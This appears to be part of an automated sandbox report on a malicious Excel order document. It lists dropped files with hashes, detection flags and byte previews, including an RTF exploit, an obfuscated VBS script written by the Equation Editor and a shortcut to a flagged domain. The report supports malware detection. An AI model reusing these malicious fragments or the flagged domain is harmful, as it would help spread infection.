                                                                      SHA1:43909958A286BA100A50825B4B3C4DC714A71287
                                                                      SHA-256:363604FC6EAB3CAAB3F274695D071FB0797EB05D900AF8D565D6D2BFFED27DCD
                                                                      SHA-512:9EE56BC51BAEFD3A2B033D30E8BB4BE10DF87889D3AF05CC2ED3755BBFA0871E157E322B39A95AB25D2C5EFD81C68F7B0189A469E64680B525845D2388428848
                                                                      Malicious:false
                                                                      Preview:....l...........0................]...?.. EMF....4.3.`.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................L...d...............A...............*...!..............?...........?................................'.......................%...........(.......................L...d...........)...A...........V...

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B10C791.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):3350324
                                                                      Entropy (8bit):1.7377088769624822
                                                                      Encrypted:false
                                                                      SSDEEP:12288:46vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgCv:RODhqH8
                                                                      MD5:A32BE3562AF3F7E24B8C4297AC5DC5C8
                                                                      SHA1:43909958A286BA100A50825B4B3C4DC714A71287
                                                                      SHA-256:363604FC6EAB3CAAB3F274695D071FB0797EB05D900AF8D565D6D2BFFED27DCD
                                                                      SHA-512:9EE56BC51BAEFD3A2B033D30E8BB4BE10DF87889D3AF05CC2ED3755BBFA0871E157E322B39A95AB25D2C5EFD81C68F7B0189A469E64680B525845D2388428848
                                                                      Malicious:false
                                                                      Preview:....l...........0................]...?.. EMF....4.3.`.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................L...d...............A...............*...!..............?...........?................................'.......................%...........(.......................L...d...........)...A...........V...

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Rich Text Format data, version 1
                                                                      Category:dropped
                                                                      Size (bytes):249980
                                                                      Entropy (8bit):2.3598396912578936
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YwENs3iItNrGpMmDD2EnD7744ARcEjlCcAizk1PhrGkZErF:lEa3JNSH2FR3vnYFFGcqF
                                                                      MD5:29D663B176F3D88812FD891D1D3EFA0F
                                                                      SHA1:600BD3E6CB7600CFC5A6752F2F537CA02E28564A
                                                                      SHA-256:81D875A8215C97BF39E091D2F6D553B6E0094DCB619DE16F2D86634AFDFAF2F9
                                                                      SHA-512:346AAF88242EE7F56D4D0869D1C2B980642C53D3B3309FDCF101763E2CDA740F652C4EEEF1670CD9EE6DB699EFF0C5494C3B7FAEAA992FD512EBFAB930CA443D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:{\rtf1...{\*\pnaiud603980834 \.}.{\4979101970(.*2%>^55-/_?7.!+%>4;2.%3;/1?@|9;.7?;^1[<[=0^%+*?(_?&|31#*5_7?`.@?)!7$`80?%=0.74(.?')%0.?-/'?9,#3*-%)+:7%|0.]0-?[?,=)?->:8/)_<5`(@-^:#9$??520*]+/?8~7(.%57@-7`0&6^!;<`#8;?*1/$3.#(^7;_:/@=???2,)%&>.:^%.-..!%*/2=6!*4/);>>)%+^:?^4]._2>8@(78$%?(:80?+8?:2~]:%4<@59`*./=]1%:,955?&72?&?/]#47<%@?1=~_.?%:+:&49~#5!+@_??/!?<,$`8?.)?[`(?|5/??4>=+8,%^[`-.`*?&^7|>*-`^9'?791?^`?'.|2.~6+:,)4??(<51-7.^.23|+0:7^&;`0(#&?^@'=1^?@?!%<>554*:~@+1;4$%:;,;_?.0*%-+|[=%-..?&&$?>=_]0.>.9,?,..(=@3??$;`9?[>?7,8&=5)]`=.8_$~059|3.%&+.#3:&;01??%#9..<2#<4?8?=:/%%$4%/`(,5:;`-????~]03=?%180>(~8|?8'#?.?~,@;?~??`)!,`3]_!#3'`..)%!~<?(3.@^>7?&(*18*%0![0%?(<*?:.734._8@]$<@6;?1%0-@.<..!2|.>.?~?'08<5%..-.241'&.$$&6!'+)74-@;4%%`/-!.;.%=0>=^$08?$(;4.;%=0|'./3*!2??:7'#4?.?%6`)6&|7?._?5$;;[.;[$_#.+(.49;?#<.+`>5+$?.%.1%*??4@3<'(@248.??!$5??9@?'5-??@^<8(.'],[`@8?72*?1;;&`/:?*;)._44~~>-)[~9|6^7>[?%1783^+<)_?$?/,=^[[%?|&4#|-#^.1?5%3&%?(?^;:?-1#?1.$+6]%#0?.,6?`.($82*.?]#3!.[&89,4`::@9:]_1!.%'_%

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):2.8678599643075064
                                                                      Encrypted:false
                                                                      SSDEEP:96:3gUkuvpInM3IxUuZQ7q+TCu0pJnr3IxUuZQ7q+T:3gwpInpxeOcWpJncxeOc
                                                                      MD5:A6FC110C1C032C8B184A58C57278A9F6
                                                                      SHA1:DA5D2A375A01AD5BEF5765664D2078521BEA807D
                                                                      SHA-256:8264F693DC14E8C67A5205DB736A967115F98EE7A8663ECA0C1C2CDF414FEAB8
                                                                      SHA-512:D22F022BADD6A8B543F13AC0827E686A08506DB34AF62CAC63A334D4747195912333BB3003B7E60068993EDA86A5E4EC41F521844D5D0D552D347BE78659B422
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1F1D1415-C9C3-4E30-97C6-2F9F926741F8}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{467E5090-C54B-4597-8451-94EBD103C431}.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11776
                                                                      Entropy (8bit):3.555243369255073
                                                                      Encrypted:false
                                                                      SSDEEP:192:11qgwJBcF3/y/MA8VDdO4hPUHLMLBKaCz6vUfrmzd+9l3p19t4RG12RYhAMh69sH:1Ya9/ypwc4hPuLMLJCzzfr3hug1BhAMV
                                                                      MD5:21F8821C518E42CF6DFF12BC481CE6F9
                                                                      SHA1:4F5E4C121E042D2BFD5159AFD0D7550CF4A1F2F4
                                                                      SHA-256:B39010B16D33566DFFEC9ADA8317F3F086D7288E269F811D127C5137F1AE6301
                                                                      SHA-512:1263E7540234069FC612C482C76CB2E7D5EF06F4E2327F6B22A8CB629EBE2F305DF02B17B1C5188EBA1F7D47F4825B66A6B044071A57E9D861BE3B3B1DDEECA7
                                                                      Malicious:false
                                                                      Preview:....9.7.9.1.0.1.9.7.0.(...*.2.%.>.^.5.5.-./._.?.7...!.+.%.>.4.;.2...%.3.;./.1.?.@.|.9.;...7.?.;.^.1.[.<.[.=.0.^.%.+.*.?.(._.?.&.|.3.1.#.*.5._.7.?.`...@.?.).!.7.$.`.8.0.?.%.=.0...7.4.(...?.'.).%.0...?.-./.'.?.9.,.#.3.*.-.%.).+.:.7.%.|.0...].0.-.?.[.?.,.=.).?.-.>.:.8./.)._.<.5.`.(.@.-.^.:.#.9.$.?.?.5.2.0.*.].+./.?.8.~.7.(...%.5.7.@.-.7.`.0.&.6.^.!.;.<.`.#.8.;.?.*.1./.$.3...#.(.^.7.;._.:./.@.=.?.?.?.2.,.).%.&.>...:.^.%...-.....!.%.*./.2.=.6.!.*.4./.).;.>.>.).%.+.^.:.?.^.4.]..._.2.>.8.@.(.7.8.$.%.?.(.:.8.0.?.+.8.?.:.2.~.].:.%.4.<.@.5.9.`.*.../.=.].1.%.:.,.9.5.5.?.&.7.2.?.&.?./.].#.4.7.<.%.@.?.1.=.~._...?.%.:.+.:.&.4.9.~.#.5.!.+.@._.?.?./.!.?.<.,.$.`.8.?...).?.[.`.(.?.|.5./.?.?.4.>.=.+.8.,.%.^.[.`.-...`.*.?.&.^.7.|.>.*.-.`.^.9.'.?.7.9.1.?.^.`.?.'...|.2...~.6.+.:.,.).4.?.?.(.<.5.1.-.7...^...2.3.|.+.0.:.7.^.&.;.`.0.(.#.&.?.^.@.'.=.1.^.?.@.?.!.%.<.>.5.5.4.*.:.~.@.+.1.;.4.$.%.:.;.,.;._.?...0.*.%.-.+.|.[.=.%.-.....?.&.&.$.?.>.=._.].0...>...9.,.?.,.....(.=.@.3.?.?.$.;.`.9.?.[.>.?.7.,.8.&.=.5.).].

                                                                      C:\Users\user\AppData\Local\Temp\1xpe2vwt.k5n.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\bkkuvkek.fso.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\g3fkhygm.pue.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\oq0bxqag.nqw.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\{2E7D2F12-E94B-41D1-B1E5-F25B060C6608}

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.02566653274851145
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPclSO9vxggLR0Yh/lSpRXv//4tfnRujlw//+GtluJ/eRuj:I3DP+S8QG/wHvYg3J/
                                                                      MD5:BFD4DBC1B936D7F58B866390F0D2A870
                                                                      SHA1:4D11AC74EAF10A833F5062A381FAEEE53FFC98E3
                                                                      SHA-256:32DCE03C3A40189949A38C2DD2CE0AE6E92404A59F60A9264E3AB1D8FFC4EF17
                                                                      SHA-512:9EB04ADDFBCA50EE96F611079F8650A160F62F33BC6C511C6ECEA374296B0FF8F2D580D291E499AC5A53DC6F579D6A710C9FD27CD2E223EF44A016178555253A
                                                                      Malicious:false
                                                                      Preview:......M.eFy...z......E.%...=.S,...X.F...Fa.q............................-P...7.G....?p.C........Ok.]!.pE....).f......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\{8FFBF85C-47ED-46A9-9B67-AB9C70A29D29}

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025553961890493235
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPc/Ak8RvxggLR5iVg1CFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPqbcdie1CbvYg3J/
                                                                      MD5:4F228FAB144AB07980CB7687D2850220
                                                                      SHA1:18A685A3D7DD1029075164F93F1C02780FB3076E
                                                                      SHA-256:73D1F239795965E1AE01CB0B30CF0ED47C18EEF3D07D46339A412BE8F71000B1
                                                                      SHA-512:FDA7B0636B012387650A963D60D10982F30D9A83159D25F67CC76F877D4D51F86D9DEC58BBABE64A1443317DA6487CE40EABC715B39DA8C002D742F7A3563542
                                                                      Malicious:false
                                                                      Preview:......M.eFy...z.J....>C....).S,...X.F...Fa.q............................3.(...I..0)..qF........+..;.G.C...K6.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DF4FF5B81CF97C9EEC.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DF5A3DDFB1D8F2532B.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.8176852288027371
                                                                      Encrypted:false
                                                                      SSDEEP:48:5InAeP0iusLEJpW1BmY7cGu0FxguGFzg7:5HyVuoEWP/gGukGuG9g7
                                                                      MD5:BF1F69E3A35062BDFDC0860EC074A018
                                                                      SHA1:0163643293CB419D7F6A7A7CA22B5A7874AD8E70
                                                                      SHA-256:83068823443F422442FF025437FAED906ED556AB2D4293D9678710DF0AC41C4A
                                                                      SHA-512:9794AF9033D8BF855B794D13019CC523532AE383D99A857095972C6926FAD881E89BF7E61AE9C57D7EDA6AAC51FD9E048F254757E4B1A30E46B14380D442B1A8
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DF92EFA9267A28986F.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:Generic INItialization configuration [xls]
                                                                      Category:modified
                                                                      Size (bytes):88
                                                                      Entropy (8bit):4.678531200055012
                                                                      Encrypted:false
                                                                      SSDEEP:3:bDp7FCWZ6BKFrKF2VVcbYmMJKFrKF2VVcbYv:bBs2xFeFyVeKEFeFyVeC
                                                                      MD5:465087A3A559708B14EB51ED601B1D60
                                                                      SHA1:408F3B620CC8051251E3A088EC37A9F1E9C0A601
                                                                      SHA-256:1E7E602BC27892E2F6CC096C102E9F45EB1EA81CAAA401041268777EB8C34F38
                                                                      SHA-512:80318650702C579C3200DA294DAD22A2C0EE5756E475DCC95539EA2B6A79DEF572FA77FAD785A2E033087EABFC7BD6A1A5003199F06F2F002F19249536703C32
                                                                      Malicious:false
                                                                      Preview:[folders]..ljg.cl.url=0..Pedido No 4500924462.LNK=0..[xls]..Pedido No 4500924462.LNK=0..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ljg.cl.url

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://ljg.cl/>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):41
                                                                      Entropy (8bit):4.473048041045147
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fX7JKovn:HRYFVm4oyn
                                                                      MD5:95A28637A1B596EF9631114025666A22
                                                                      SHA1:24B2353EB74594410C1F2A11C9ED789C8087C6A1
                                                                      SHA-256:8A6654BA79E70732CD9E106F90A7AE728D1B870398963ECFEBD4C07E01C8E93F
                                                                      SHA-512:8A7FFD99105BB4357A612F341A86AACFD008BFFE943F6F7DB016A41FCC2277524CF445E2DBD8F0D737C47E499EB08A846B3155ABC4F91FB014DBD4E917DB9441
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://ljg.cl/..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.503835550707525
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
                                                                      MD5:B37CE9E8345F9558D8E3AFB62D07B0DF
                                                                      SHA1:99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
                                                                      SHA-256:B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
                                                                      SHA-512:88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
                                                                      Malicious:false
                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                      C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs

                                                                      Download File
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):164934
                                                                      Entropy (8bit):3.909751863320666
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tfSbgch/i6M5Cde7vL5vyaGuBfSbgch/i6M5Cde7vL5gfSbgch/i6M5Cde7vL51:tfSbjhZdQL5tfSbjhZdQL5gfSbjhZdQf
                                                                      MD5:B9765F41CF6B094C309E61D92530447F
                                                                      SHA1:A708DD6C737B06BF842D7933AAC106BB97AA60D3
                                                                      SHA-256:1168E97D0CCBC4A68C3BFA7C420D9BBDB2D985B225109E9FF6D4558AA0BE2BB5
                                                                      SHA-512:8AA37821D21CA75EB4F721A3285417C798597DDAD958A5AB620A3EF2A3968433BB6CF91F2E237CEEADB0C55AC9EDA87CA60D7F203074768F82CDDF25F4226192
                                                                      Malicious:true
                                                                      Preview:..........W.L.L.P.Q.B.K.Z.R.f.U.W.L.R.k. .=. .".O.J.e.z.u.W.z.x.L.i.z.b.h.N.a.".....W.r.L.W.G.e.K.c.q.f.l.u.K.t.x. .=. .".W.W.k.p.K.p.A.L.i.i.u.d.G.e.W.".....z.K.T.k.K.i.l.h.O.t.p.l.e.R.A. .=. .".U.G.G.t.K.s.N.i.G.x.u.L.B.W.I.".....i.h.e.n.l.c.e.K.L.L.L.h.j.A.v. .=. .".s.W.L.q.i.c.L.C.K.P.G.P.N.i.n.".....L.p.c.L.h.C.m.n.b.W.K.P.L.L.K. .=. .".I.K.n.p.K.f.L.m.N.u.f.L.r.f.B.".....B.U.p.z.W.W.N.z.p.d.W.L.U.P.L. .=. .".G.L.f.L.l.d.N.a.L.Z.G.l.U.L.d.".........i.K.U.O.C.j.K.o.K.L.b.e.p.K.L. .=. .".p.L.W.W.o.G.J.i.x.S.u.U.G.n.P.".....z.m.z.e.O.G.c.R.c.h.A.x.B.m.t. .=. .".f.Z.B.d.c.L.O.n.n.i.o.c.z.a.G.".....c.W.W.t.U.C.a.I.k.U.i.f.K.A.W. .=. .".f.p.k.L.h.W.Z.h.S.P.K.i.O.K.b.".........i.K.s.L.U.e.n.m.i.k.C.i.A.h.U. .=. .".B.Z.x.k.T.G.U.T.e.S.W.i.H.f.T.".....f.B.O.i.u.b.B.K.c.t.B.G.c.U.L. .=. .".P.T.f.A.i.N.l.Z.h.N.A.T.U.g.A.".....P.b.q.O.u.p.a.z.K.K.Z.A.K.Z.r. .=. .".h.u.L.l.k.l.W.G.S.L.W.A.Z.a.J.".....K.o.q.N.c.c.j.m.l.U.Z.S.k.K.B. .=. .".U.G.Z.W.u.K.b.o.o.O.c.W.Z.e.r.".....U.a.b.k.K.z.c.L.U.Z.

                                                                      C:\Users\user\Desktop\8A830000

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 16:56:45 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):246272
                                                                      Entropy (8bit):7.946723019450002
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/Au6XnezAUG0xQvkyXxzYztZAZv0NHtzJCR:dYulwckWH5U
                                                                      MD5:F971B73060C51565F2877697065DD19B
                                                                      SHA1:CE7CF4222C6B364439421E7CBF7B5AC8302212ED
                                                                      SHA-256:7B2B5DE6D84229E0F38E1BA15D60CBEE672AC87C060BA7556AC1EAE3154BBD18
                                                                      SHA-512:A1B9A7B5B65977D9551F12A5E7E7856238DFA584DDACBD10CFCDC82BC417BF6A6DB9AC8F7AA806BD100456116237BEEB475F2240A8831D10DA0725F91B099553
                                                                      Malicious:false
                                                                      Preview:......................>...................................$...................f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...............G...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...&...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...g.......h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Users\user\Desktop\8A830000:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\Desktop\Pedido No 4500924462.xls (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 16:56:45 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):246272
                                                                      Entropy (8bit):7.946723019450002
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/Au6XnezAUG0xQvkyXxzYztZAZv0NHtzJCR:dYulwckWH5U
                                                                      MD5:F971B73060C51565F2877697065DD19B
                                                                      SHA1:CE7CF4222C6B364439421E7CBF7B5AC8302212ED
                                                                      SHA-256:7B2B5DE6D84229E0F38E1BA15D60CBEE672AC87C060BA7556AC1EAE3154BBD18
                                                                      SHA-512:A1B9A7B5B65977D9551F12A5E7E7856238DFA584DDACBD10CFCDC82BC417BF6A6DB9AC8F7AA806BD100456116237BEEB475F2240A8831D10DA0725F91B099553
                                                                      Malicious:true
                                                                      Preview:......................>...................................$...................f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...............G...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...&...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...g.......h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      Static File Info

                                                                      General

